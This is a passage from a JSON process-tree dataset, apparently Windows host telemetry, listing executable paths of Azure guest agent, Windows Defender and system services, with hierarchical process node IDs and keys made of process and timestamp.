ogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\mpam-d3ea18d4.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\wuauclt.exe\",\"c:\\\\windows\\\\softwaredistribution\\\\download\\\\install\\\\am_delta.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\"],\"path\":[\"1000\",\"1000/0\",\"1000/100\",\"1000/102\",\"1000/109\",\"1000/122\",\"1000/131\",\"1000/133\",\"1000/141\",\"1000/170\",\"1000/170/173\",\"1000/170/173/174\",\"1000/170/177\",\"1000/170/177/180\",\"1000/170/177/182\",\"1000/170/179\",\"1000/170/179/181\",\"1000/170/183\",\"1000/170/183/184\",\"1000/170/185\",\"1000/170/185/186\",\"1000/170/185/187\",\"1000/170/192\",\"1000/170/192/193\",\"1000/170/194\",\"1000/170/194/195\",\"1000/170/196\",\"1000/170/196/197\",\"1000/170/206\",\"1000/170/206/207\",\"1000/170/231\",\"1000/170/231/232\",\"1000/170/302\",\"1000/170/302/303\",\"1000/170/304\",\"1000/170/304/305\",\"1000/170/304/316\",\"1000/170/304/317\",\"1000/170/341\",\"1000/170/341/342\",\"1000/170/347\",\"1000/170/347/348\",\"1000/170/351\",\"1000/170/351/352\",\"1000/170/353\",\"1000/170/353/354\",\"1000/170/357\",\"1000/170/357/358\",\"1000/170/361\",\"1000/170/361/362\",\"1000/170/370\",\"1000/170/370/371\",\"1000/170/372\",\"1000/170/372/373\",\"1000/170/378\",\"1000/170/378/379\",\"1000/170/380\",\"1000/170/380/381\",\"1000/170/417\",\"1000/170/417/418\",\"1000/170/442\",\"1000/170/442/443\",\"1000/170/488\",\"1000/170/488/489\",\"1000/170/495\",\"1000/170/495/496\",\"1000/170/506\",\"1000/170/506/507\",\"1000/170/508\",\"1000/170/508/509\",\"1000/170/510\",\"1000/170/510/511\",\"1000/170/515\",\"1000/170/515/516\",\"1000/170/522\",\"1000/170/522/523\",\"1000/170/524\",\"1000/170/524/525\",\"1000/170/528\",\"1000/170/528/529\",\"1000/170/533\",\"1000/170/533/534\",\"1000/170/541\",\"1000/170/541/542\",\"1000/170/575\",\"1000/170/575/576\",\"1000/170/600\",\"1000/170/600/601\",\"1000/170/631\",\"1000/170/631/632\",\"1000/170/633\",\"1000/170/633/634\",\"1000/170/636\",\"1000/170/636/637\",\"1000/170/638\",\"1000/170/638/639\",\"1000/170/644\",\"1000/170/644/646\",\"1000/170/645\",\"1000/170/645/647\",\"1000/170/651\",\"1000/170/651/652\",\"1000/170/653\",\"1000/170/653/654\",\"1000/170/659\",\"1000/170/659/660\",\"1000/170/665\",\"1000/170/665/666\",\"1000/170/679\",\"1000/170/679/680\",\"1000/170/725\",\"1000/170/725/726\",\"1000/170/754\",\"1000/170/754/755\",\"1000/170/760\",\"1000/170/760/761\",\"1000/170/765\",\"1000/170/765/766\",\"1000/170/767\",\"1000/170/767/768\",\"1000/170/769\",\"1000/170/769/770\",\"1000/170/775\",\"1000/170/775/776\",\"1000/170/781\",\"1000/170/781/782\",\"1000/170/783\",\"1000/170/783/784\",\"1000/170/786\",\"1000/170/786/787\",\"1000/170/795\",\"1000/170/795/796\",\"1000/170/799\",\"1000/170/799/800\",\"1000/170/826\",\"1000/170/826/828\",\"1000/170/853\",\"1000/170/853/854\",\"1000/170/891\",\"1000/170/891/893\",\"1000/170/892\",\"1000/170/892/894\",\"1000/170/900\",\"1000/170/900/901\",\"1000/170/902\",\"1000/170/902/903\",\"1000/170/906\",\"1000/170/906/907\",\"1000/170/908\",\"1000/170/908/909\",\"1000/170/917\",\"1000/170/917/918\",\"1000/170/919\",\"1000/170/919/920\",\"1000/170/921\",\"1000/170/921/922\",\"1000/170/924\",\"1000/170/924/925\",\"1000/170/942\",\"1000/170/942/944\",\"1000/170/943\",\"1000/170/943/945\",\"1000/171\",\"1000/172\",\"1000/175\",\"1000/178\",\"1000/188\",\"1000/189\",\"1000/191\",\"1000/340\",\"1000/360\",\"1000/369\",\"1000/383\",\"1000/498\",\"1000/518\",\"1000/536\",\"1000/649\",\"1000/662\",\"1000/668\",\"1000/7\",\"1000/71\",\"1000/73\",\"1000/763\",\"1000/778\",\"1000/798\",\"1000/80\",\"1000/898\",\"1000/915\",\"1000/931\",\"1001\",\"1001/1\",\"1001/1/2\",\"1002\",\"1002/110\",\"1002/110/111\",\"1002/110/112\",\"1002/110/113\",\"1002/110/114\",\"1002/110/115\",\"1002/110/116\",\"1002/110/117\",\"1002/110/118\",\"1002/119\",\"1002/125\",\"1002/126\",\"1002/138\",\"1002/14\",\"1002/142\",\"1002/142/143\",\"1002/142/144\",\"1002/142/145\",\"1002/142/146\",\"1002/142/147\",\"1002/142/148\",\"1002/142/149\",\"1002/142/150\",\"1002/142/151\",\"1002/142/151/152\",\"1002/142/151/152/153\",\"1002/142/151/152/154\",\"1002/142/151/152/155\",\"1002/142/151/152/156\",\"1002/142/151/152/157\",\"1002/142/151/152/158\",\"1002/142/151/152/159\",\"1002/142/151/152/160\",\"1002/142/151/152/161\",\"1002/142/151/152/162\",\"1002/142/151/152/163\",\"1002/142/151/152/163/164\",\"1002/142/151/152/163/164/165\",\"1002/142/151/152/163/164/166\",\"1002/142/151/152/163/164/167\",\"1002/142/151/152/163/164/168\",\"1002/142/151/152/163/164/169\",\"1002/142/151/152/163/164/198\",\"1002/142/151/152/163/164/199\",\"1002/142/151/152/163/164/200\",\"1002/142/151/152/163/164/201\",\"1002/142/151/152/163/164/202\",\"1002/142/151/152/163/164/203\",\"1002/142/151/152/163/164/204\",\"1002/142/151/152/163/164/205\",\"1002/142/151/152/163/164/209\",\"1002/142/151/152/163/164/210\",\"1002/142/151/152/163/164/211\",\"1002/142/151/152/163/164/212\",\"1002/142/151/152/163/164/213\",\"1002/142/151/152/163/164/214\",\"1002/142/151/152/163/164/215\",\"1002/142/151/152/163/164/216\",\"1002/142/151/152/163/164/217\",\"1002/142/151/152/163/164/218\",\"1002/142/151/152/163/164/219\",\"1002/142/151/152/163/164/220\",\"1002/142/151/152/163/164/221\",\"1002/142/151/152/163/164/222\",\"1002/142/151/152/163/164/223\",\"1002/142/151/152/163/164/224\",\"1002/142/151/152/163/164/225\",\"1002/142/151/152/226\",\"1002/142/151/152/227\",\"1002/142/151/152/228\",\"1002/142/229\",\"1002/142/233\",\"1002/142/234\",\"1002/142/235\",\"1002/142/236\",\"1002/142/237\",\"1002/142/238\",\"1002/142/239\",\"1002/142/240\",\"1002/142/241\",\"1002/142/242\",\"1002/142/243\",\"1002/142/244\",\"1002/142/245\",\"1002/142/246\",\"1002/142/247\",\"1002/142/247/248\",\"1002/142/247/248/249\",\"1002/142/247/248/250\",\"1002/142/247/248/251\",\"1002/142/247/248/252\",\"1002/142/247/248/253\",\"1002/142/247/248/254\",\"1002/142/247/248/255\",\"1002/142/247/248/256\",\"1002/142/247/248/256/257\",\"1002/142/247/248/256/257/258\",\"1002/142/247/248/256/257/259\",\"1002/142/247/248/256/257/260\",\"1002/142/247/248/256/257/261\",\"1002/142/247/248/256/257/262\",\"1002/142/247/248/256/257/263\",\"1002/142/247/248/256/257/264\",\"1002/142/247/248/256/257/265\",\"1002/142/247/248/256/257/266\",\"1002/142/247/248/256/257/267\",\"1002/142/247/248/256/257/268\",\"1002/142/247/248/256/257/269\",\"1002/142/247/248/256/257/270\",\"1002/142/247/248/256/257/271\",\"1002/142/247/248/256/257/272\",\"1002/142/247/248/256/257/273\",\"1002/142/247/248/274\",\"1002/142/247/248/275\",\"1002/142/247/248/276\",\"1002/142/247/248/277\",\"1002/142/247/248/278\",\"1002/142/247/248/279\",\"1002/142/247/248/280\",\"1002/142/247/248/281\",\"1002/142/247/248/282\",\"1002/142/247/248/283\",\"1002/142/247/248/284\",\"1002/142/247/248/285\",\"1002/142/247/248/286\",\"1002/142/247/248/287\",\"1002/142/247/248/288\",\"1002/142/247/248/289\",\"1002/142/247/248/289/290\",\"1002/142/247/248/289/290/291\",\"1002/142/247/248/289/290/292\",\"1002/142/247/248/289/290/293\",\"1002/142/247/248/289/290/294\",\"1002/142/247/248/289/290/295\",\"1002/142/247/248/289/290/296\",\"1002/142/247/248/289/290/297\",\"1002/142/247/248/289/290/298\",\"1002/142/247/248/289/290/299\",\"1002/142/247/248/289/290/300\",\"1002/142/247/248/289/290/301\",\"1002/142/247/248/289/290/306\",\"1002/142/247/248/289/290/307\",\"1002/142/247/248/289/290/308\",\"1002/142/247/248/289/290/309\",\"1002/142/247/248/289/290/310\",\"1002/142/247/248/289/290/311\",\"1002/142/247/248/289/290/312\",\"1002/142/247/248/289/290/313\",\"1002/142/247/248/289/290/314\",\"1002/142/247/248/289/290/315\",\"1002/142/247/248/289/290/318\",\"1002/142/247/248/289/290/319\",\"1002/142/247/248/289/290/320\",\"1002/142/247/248/289/290/321\",\"1002/142/247/248/289/290/322\",\"1002/142/247/248/289/290/323\",\"1002/142/247/248/289/290/324\",\"1002/142/247/248/289/290/325\",\"1002/142/247/248/289/290/326\",\"1002/142/247/248/327\",\"1002/142/247/248/328\",\"1002/142/247/248/329\",\"1002/142/247/248/330\",\"1002/142/247/248/331\",\"1002/142/247/248/332\",\"1002/142/333\",\"1002/142/334\",\"1002/142/335\",\"1002/142/336\",\"1002/142/337\",\"1002/142/338\",\"1002/17\",\"1002/17/18\",\"1002/17/19\",\"1002/17/20\",\"1002/17/21\",\"1002/17/22\",\"1002/17/23\",\"1002/24\",\"1002/24/25\",\"1002/24/26\",\"1002/24/27\",\"1002/24/28\",\"1002/24/29\",\"1002/24/30\",\"1002/24/31\",\"1002/24/32\",\"1002/24/33\",\"1002/24/33/34\",\"1002/24/33/34/35\",\"1002/24/33/34/36\",\"1002/24/33/34/37\",\"1002/24/33/34/38\",\"1002/24/33/34/39\",\"1002/24/33/34/40\",\"1002/24/33/34/41\",\"1002/24/33/34/42\",\"1002/24/33/34/43\",\"1002/24/33/34/44\",\"1002/24/33/34/45\",\"1002/24/33/34/46\",\"1002/24/33/34/47\",\"1002/24/33/34/48\",\"1002/24/49\",\"1002/24/50\",\"1002/24/51\",\"1002/24/52\",\"1002/24/53\",\"1002/24/61\",\"1002/24/62\",\"1002/24/63\",\"1002/24/64\",\"1002/24/65\",\"1002/24/66\",\"1002/3\",\"1002/345\",\"1002/355\",\"1002/355/356\",\"1002/363\",\"1002/368\",\"1002/374\",\"1002/375\",\"1002/375/376\",\"1002/384\",\"1002/389\",\"1002/389/390\",\"1002/389/391\",\"1002/389/392\",\"1002/389/393\",\"1002/389/394\",\"1002/389/395\",\"1002/389/396\",\"1002/389/397\",\"1002/389/398\",\"1002/389/398/399\",\"1002/389/398/399/400\",\"1002/389/398/399/401\",\"1002/389/398/399/402\",\"1002/389/398/399/403\",\"1002/389/398/399/404\",\"1002/389/398/399/405\",\"1002/389/398/399/406\",\"1002/389/398/399/407\",\"1002/389/398/399/408\",\"1002/389/398/399/409\",\"1002/389/398/399/410\",\"1002/389/398/399/411\",\"1002/389/398/399/412\",\"1002/389/398/399/413\",\"1002/389/398/399/414\",\"1002/389/398/399/415\",\"1002/389/416\",\"1002/389/419\",\"1002/389/420\",\"1002/389/421\",\"1002/389/422\",\"1002/389/423\",\"1002/389/424\",\"1002/389/425\",\"1002/389/426\",\"1002/389/427\",\"1002/389/428\",\"1002/389/429\",\"1002/389/430\",\"1002/389/431\",\"1002/389/432\",\"1002/389/433\",\"1002/389/433/434\",\"1002/389/433/434/435\",\"1002/389/433/434/436\",\"1002/389/433/434/437\",\"1002/389/433/434/438\",\"1002/389/433/434/439\",\"1002/389/433/434/440\",\"1002/389/433/434/441\",\"1002/389/433/434/444\",\"1002/389/433/434/444/445\",\"1002/389/433/434/444/445/446\",\"1002/389/433/434/444/445/447\",\"1002/389/433/434/444/445/448\",\"1002/389/433/434/444/445/449\",\"1002/389/433/434/444/445/450\",\"1002/389/433/434/444/445/451\",\"1002/389/433/434/444/445/452\",\"1002/389/433/434/444/445/453\",\"1002/389/433/434/444/445/454\",\"1002/389/433/434/444/445/455\",\"1002/389/433/434/444/445/456\",\"1002/389/433/434/444/445/457\",\"1002/389/433/434/444/445/458\",\"1002/389/433/434/444/445/459\",\"1002/389/433/434/460\",\"1002/389/433/434/461\",\"1002/389/433/434/462\",\"1002/389/433/434/463\",\"1002/389/433/434/464\",\"1002/389/433/434/465\",\"1002/389/433/434/466\",\"1002/389/433/434/467\",\"1002/389/433/434/468\",\"1002/389/433/434/469\",\"1002/389/433/434/470\",\"1002/389/433/434/471\",\"1002/389/433/434/472\",\"1002/389/433/434/473\",\"1002/389/433/434/474\",\"1002/389/433/434/475\",\"1002/389/433/434/476\",\"1002/389/433/434/477\",\"1002/389/433/434/478\",\"1002/389/433/434/479\",\"1002/389/433/434/480\",\"1002/389/433/434/481\",\"1002/389/482\",\"1002/389/483\",\"1002/389/484\",\"1002/389/485\",\"1002/389/486\",\"1002/389/487\",\"1002/490\",\"1002/490/491\",\"1002/490/493\",\"1002/490/493/494\",\"1002/499\",\"1002/500\",\"1002/500/501\",\"1002/512\",\"1002/512/513\",\"1002/519\",\"1002/532\",\"1002/537\",\"1002/538\",\"1002/540\",\"1002/543\",\"1002/543/544\",\"1002/543/545\",\"1002/543/546\",\"1002/543/547\",\"1002/543/548\",\"1002/543/549\",\"1002/543/550\",\"1002/543/551\",\"1002/543/552\",\"1002/543/552/553\",\"1002/543/552/553/554\",\"1002/543/552/553/555\",\"1002/543/552/553/556\",\"1002/543/552/553/557\",\"1002/543/552/553/558\",\"1002/543/552/553/559\",\"1002/543/552/553/560\",\"1002/543/552/553/561\",\"1002/543/552/553/562\",\"1002/543/552/553/563\",\"1002/543/552/553/564\",\"1002/543/552/553/565\",\"1002/543/552/553/566\",\"1002/543/552/553/567\",\"1002/543/552/553/568\",\"1002/543/552/553/569\",\"1002/543/570\",\"1002/543/571\",\"1002/543/572\",\"1002/543/573\",\"1002/543/574\",\"1002/543/577\",\"1002/543/578\",\"1002/543/579\",\"1002/543/580\",\"1002/543/581\",\"1002/543/582\",\"1002/543/583\",\"1002/543/584\",\"1002/543/585\",\"1002/543/586\",\"1002/543/587\",\"1002/543/587/588\",\"1002/543/587/588/589\",\"1002/543/587/588/590\",\"1002/543/587/588/591\",\"1002/543/587/588/592\",\"1002/543/587/588/593\",\"1002/543/587/588/596\",\"1002/543/587/588/597\",\"1002/543/587/588/598\",\"1002/543/587/588/599\",\"1002/543/587/588/602\",\"1002/543/587/588/603\",\"1002/543/587/588/604\",\"1002/543/587/588/605\",\"1002/543/587/588/606\",\"1002/543/587/588/607\",\"1002/543/587/588/608\",\"1002/543/587/588/609\",\"1002/543/587/588/610\",\"1002/543/587/588/611\",\"1002/543/587/588/612\",\"1002/543/587/588/613\",\"1002/543/587/588/614\",\"1002/543/587/588/615\",\"1002/543/587/588/616\",\"1002/543/587/588/617\",\"1002/543/587/588/618\",\"1002/543/587/588/619\",\"1002/543/587/588/622\",\"1002/543/587/588/623\",\"1002/543/587/588/624\",\"1002/543/625\",\"1002/543/626\",\"1002/543/627\",\"1002/543/628\",\"1002/543/629\",\"1002/543/630\",\"1002/635\",\"1002/650\",\"1002/661\",\"1002/663\",\"1002/663/664\",\"1002/669\",\"1002/670\",\"1002/670/671\",\"1002/670/672\",\"1002/670/673\",\"1002/670/674\",\"1002/670/675\",\"1002/670/676\",\"1002/670/677\",\"1002/670/678\",\"1002/670/681\",\"1002/670/681/682\",\"1002/670/681/682/683\",\"1002/670/681/682/684\",\"1002/670/681/682/685\",\"1002/670/681/682/686\",\"1002/670/681/682/687\",\"1002/670/681/682/688\",\"1002/670/681/682/689\",\"1002/670/681/682/690\",\"1002/670/681/682/691\",\"1002/670/681/682/692\",\"1002/670/681/682/693\",\"1002/670/681/682/694\",\"1002/670/681/682/695\",\"1002/670/681/682/696\",\"1002/670/681/682/697\",\"1002/670/681/682/698\",\"1002/670/699\",\"1002/670/700\",\"1002/670/701\",\"1002/670/702\",\"1002/670/703\",\"1002/670/704\",\"1002/670/705\",\"1002/670/706\",\"1002/670/707\",\"1002/670/708\",\"1002/670/709\",\"1002/670/710\",\"1002/670/711\",\"1002/670/712\",\"1002/670/713\",\"1002/670/714\",\"1002/670/714/715\",\"1002/670/714/715/716\",\"1002/670/714/715/717\",\"1002/670/714/715/718\",\"1002/670/714/715/719\",\"1002/670/714/715/720\",\"1002/670/714/715/721\",\"1002/670/714/715/722\",\"1002/670/714/715/723\",\"1002/670/714/715/724\",\"1002/670/714/715/727\",\"1002/670/714/715/728\",\"1002/670/714/715/729\",\"1002/670/714/715/730\",\"1002/670/714/715/731\",\"1002/670/714/715/732\",\"1002/670/714/715/733\",\"1002/670/714/715/734\",\"1002/670/714/715/735\",\"1002/670/714/715/736\",\"1002/670/714/715/737\",\"1002/670/714/715/738\",\"1002/670/714/715/739\",\"1002/670/714/715/740\",\"1002/670/714/715/741\",\"1002/670/714/715/742\",\"1002/670/714/715/743\",\"1002/670/714/715/744\",\"1002/670/714/715/745\",\"1002/670/714/715/746\",\"1002/670/714/715/747\",\"1002/670/748\",\"1002/670/749\",\"1002/670/750\",\"1002/670/751\",\"1002/670/752\",\"1002/670/753\",\"1002/764\",\"1002/779\",\"1002/785\",\"1002/790\",\"1002/801\",\"1002/802\",\"1002/802/803\",\"1002/802/804\",\"1002/802/805\",\"1002/802/806\",\"1002/802/807\",\"1002/802/808\",\"1002/802/809\",\"1002/802/810\",\"1002/802/811\",\"1002/802/811/812\",\"1002/802/811/812/813\",\"1002/802/811/812/814\",\"1002/802/811/812/815\",\"1002/802/811/812/816\",\"1002/802/811/812/817\",\"1002/802/811/812/817/818\",\"1002/802/811/812/819\",\"1002/802/811/812/820\",\"1002/802/811/812/821\",\"1002/802/811/812/822\",\"1002/802/811/812/823\",\"1002/802/811/812/824\",\"1002/802/811/812/825\",\"1002/802/811/812/827\",\"1002/802/811/812/827/829\",\"1002/802/811/812/830\",\"1002/802/811/812/831\",\"1002/802/811/812/832\",\"1002/802/833\",\"1002/802/834\",\"1002/802/835\",\"1002/802/836\",\"1002/802/837\",\"1002/802/838\",\"1002/802/839\",\"1002/802/840\",\"1002/802/841\",\"1002/802/842\",\"1002/802/843\",\"1002/802/844\",\"1002/802/845\",\"1002/802/846\",\"1002/802/847\",\"1002/802/848\",\"1002/802/848/849\",\"1002/802/848/849/850\",\"1002/802/848/849/851\",\"1002/802/848/849/852\",\"1002/802/848/849/855\",\"1002/802/848/849/856\",\"1002/802/848/849/857\",\"1002/802/848/849/858\",\"1002/802/848/849/859\",\"1002/802/848/849/860\",\"1002/802/848/849/861\",\"1002/802/848/849/862\",\"1002/802/848/849/863\",\"1002/802/848/849/864\",\"1002/802/848/849/865\",\"1002/802/848/849/866\",\"1002/802/848/849/867\",\"1002/802/848/849/868\",\"1002/802/848/849/869\",\"1002/802/848/849/870\",\"1002/802/848/849/871\",\"1002/802/848/849/872\",\"1002/802/848/849/873\",\"1002/802/848/849/874\",\"1002/802/848/849/875\",\"1002/802/848/849/876\",\"1002/802/848/849/877\",\"1002/802/848/849/878\",\"1002/802/848/849/879\",\"1002/802/848/849/880\",\"1002/802/848/849/881\",\"1002/802/882\",\"1002/802/883\",\"1002/802/884\",\"1002/802/885\",\"1002/802/886\",\"1002/802/887\",\"1002/888\",\"1002/899\",\"1002/904\",\"1002/904/905\",\"1002/916\",\"1002/92\",\"1002/923\",\"1002/932\",\"1002/933\",\"1002/933/934\",\"1002/933/935\",\"1002/933/936\",\"1002/933/937\",\"1002/933/938\",\"1002/933/939\",\"1002/933/940\",\"1002/933/941\",\"1002/933/946\",\"1002/933/947\",\"1002/933/948\",\"1002/933/949\",\"1002/933/950\",\"1002/933/951\",\"1002/933/952\",\"1002/933/953\",\"1002/933/954\",\"1002/933/955\",\"1002/933/956\",\"1002/933/957\",\"1002/933/958\",\"1002/933/959\",\"1002/933/960\",\"1002/933/961\",\"1002/933/962\",\"1002/933/962/963\",\"1002/933/962/963/964\",\"1002/933/962/963/965\",\"1002/933/962/963/966\",\"1002/933/962/963/967\",\"1002/933/962/963/968\",\"1002/933/962/963/969\",\"1002/933/962/963/970\",\"1002/933/962/963/971\",\"1002/933/962/963/972\",\"1002/933/962/963/973\",\"1002/933/962/963/974\",\"1002/933/962/963/975\",\"1002/933/962/963/976\",\"1002/933/962/963/977\",\"1002/933/962/963/978\",\"1002/933/962/963/979\",\"1002/933/962/963/980\",\"1002/933/962/963/981\",\"1002/933/962/963/982\",\"1002/933/962/963/983\",\"1002/933/962/963/984\",\"1002/933/962/963/985\",\"1002/933/962/963/986\",\"1002/933/962/963/987\",\"1002/933/962/963/988\",\"1002/933/962/963/989\",\"1002/933/962/963/990\",\"1002/933/962/963/991\",\"1002/933/962/963/992\",\"1002/933/962/963/993\",\"1002/933/994\",\"1002/933/995\",\"1002/933/996\",\"1002/933/997\",\"1002/933/998\",\"1002/933/999\",\"1003\",\"1003/101\",\"1003/132\",\"1003/176\",\"1003/190\",\"1003/230\",\"1003/339\",\"1003/346\",\"1003/359\",\"1003/382\",\"1003/4\",\"1003/492\",\"1003/497\",\"1003/514\",\"1003/517\",\"1003/535\",\"1003/539\",\"1003/648\",\"1003/667\",\"1003/72\",\"1003/762\",\"1003/777\",\"1003/780\",\"1003/797\",\"1003/897\",\"1003/914\",\"1003/930\",\"1004\",\"1004/10\",\"1004/10/11\",\"1004/107\",\"1004/107/108\",\"1004/120\",\"1004/120/121\",\"1004/127\",\"1004/127/128\",\"1004/129\",\"1004/129/130\",\"1004/139\",\"1004/139/140\",\"1004/15\",\"1004/15/16\",\"1004/5\",\"1004/5/6\",\"1004/67\",\"1004/67/68\",\"1004/76\",\"1004/76/77\",\"1004/78\",\"1004/78/79\",\"1004/8\",\"1004/8/9\",\"1005\",\"1005/12\",\"1005/12/13\",\"1006\",\"1006/54\",\"1006/55\",\"1006/56\",\"1006/57\",\"1006/58\",\"1006/59\",\"1006/60\",\"1007\",\"1007/103\",\"1007/103/104\",\"1007/103/105\",\"1007/103/105/106\",\"1007/123\",\"1007/123/124\",\"1007/134\",\"1007/134/135\",\"1007/134/136\",\"1007/134/136/137\",\"1007/343\",\"1007/343/344\",\"1007/343/349\",\"1007/343/349/350\",\"1007/364\",\"1007/364/365\",\"1007/364/366\",\"1007/364/366/367\",\"1007/385\",\"1007/385/386\",\"1007/385/387\",\"1007/385/387/388\",\"1007/502\",\"1007/502/503\",\"1007/502/504\",\"1007/502/504/505\",\"1007/520\",\"1007/520/521\",\"1007/520/526\",\"1007/520/526/527\",\"1007/530\",\"1007/530/531\",\"1007/594\",\"1007/594/595\",\"1007/594/620\",\"1007/594/620/621\",\"1007/640\",\"1007/640/641\",\"1007/640/642\",\"1007/640/642/643\",\"1007/655\",\"1007/655/656\",\"1007/655/657\",\"1007/655/657/658\",\"1007/69\",\"1007/69/70\",\"1007/69/74\",\"1007/69/74/75\",\"1007/756\",\"1007/756/757\",\"1007/756/758\",\"1007/756/758/759\",\"1007/771\",\"1007/771/772\",\"1007/771/773\",\"1007/771/773/774\",\"1007/788\",\"1007/788/789\",\"1007/791\",\"1007/791/792\",\"1007/791/793\",\"1007/791/793/794\",\"1007/889\",\"1007/889/890\",\"1007/889/895\",\"1007/889/895/896\",\"1007/910\",\"1007/910/911\",\"1007/910/912\",\"1007/910/912/913\",\"1007/926\",\"1007/926/927\",\"1007/926/928\",\"1007/926/928/929\",\"1008\",\"1008/81\",\"1008/81/82\",\"1008/81/84\",\"1008/81/84/97\",\"1008/81/84/97/99\",\"1008/83\",\"1008/83/86\",\"1008/83/88\",\"1008/85\",\"1008/85/87\",\"1008/93\",\"1008/94\",\"1008/94/95\",\"1008/94/96\",\"1009\",\"1009/208\",\"1009/377\",\"1009/89\",\"1009/89/90\",\"1009/89/90/91\",\"1009/98\"],\"proc_key\":[\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0xda4|2019-02-09 20:04:38.017000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0xed8|2019-02-09 23:13:26.497000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x1b74|2019-02-09 